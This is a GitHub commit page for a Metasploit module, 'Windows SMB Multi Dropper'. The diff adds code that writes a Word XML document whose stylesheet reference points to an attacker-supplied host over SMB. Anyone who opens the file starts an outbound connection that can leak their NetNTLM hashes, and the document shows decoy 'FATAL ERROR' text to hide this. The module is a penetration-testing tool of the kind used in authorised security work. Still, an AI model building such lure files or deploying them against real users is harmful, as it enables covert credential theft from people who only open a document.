Permalink
Browse files

Land #10589, multidrop support for word xml docs

  • Loading branch information...
space-r7 committed Sep 12, 2018
2 parents edbe498 + 14aee3a commit 5b81ebd81bb9adc7a10adc48f35c85ad496569a3
Showing with 22 additions and 4 deletions.
  1. +22 −4 modules/auxiliary/fileformat/multidrop.rb
@@ -13,28 +13,30 @@ def initialize(info={})
'Name' => 'Windows SMB Multi Dropper',
'Description' => %q{
This module dependent on the given filename extension creates either
a .lnk, .scf, .url, desktop.ini file which includes a reference
a .lnk, .scf, .url, .xml, or desktop.ini file which includes a reference
to the the specified remote host, causing SMB connections to be initiated
from any user that views the file.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Richard Davy - secureyourit.co.uk', #Module written by Richard Davy
'Lnk Creation Code by Mubix' #Lnk Creation Code written by Mubix
'Lnk Creation Code by Mubix', #Lnk Creation Code written by Mubix
'asoto-r7' #Word XML creation code
],
'Platform' => [ 'win' ],
'References' =>
[
['URL', 'https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018'],
['URL', 'https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/']
['URL', 'https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/'],
['URL', 'https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/'],
]
))
register_options(
[
OptAddress.new("LHOST", [ true, "Host listening for incoming SMB/WebDAV traffic", nil]),
OptString.new("FILENAME", [ true, "Filename - supports *.lnk, *.scf, *.url, desktop.ini", "word.lnk"]),
OptString.new("FILENAME", [ true, "Filename - supports *.lnk, *.scf, *.url, *.xml, desktop.ini", "word.lnk"]),
])
end
@@ -47,6 +49,10 @@ def run
create_desktopini
elsif datastore['FILENAME'].chars.last(3).join=="url"
create_url
elsif datastore['FILENAME'].chars.last(3).join=="xml"
create_xml
else
fail_with(Failure::BadConfig,"Invalid FILENAME option")
end
end
@@ -137,4 +143,16 @@ def create_url
file_create(url)
end
def create_xml
xml=""
xml << "<?xml version='1.0' encoding='utf-8' ?>"
xml << "<?mso-application progid='Word.Document'?>"
xml << "<?xml-stylesheet type='text/xsl' href='file://#{datastore['LHOST']}/share/word.xsl'?>"
xml << "<Text>"
xml << " FATAL ERROR: The document failed to render properly."
xml << "</Text>"
file_create(xml)
end
end

0 comments on commit 5b81ebd

Please sign in to comment.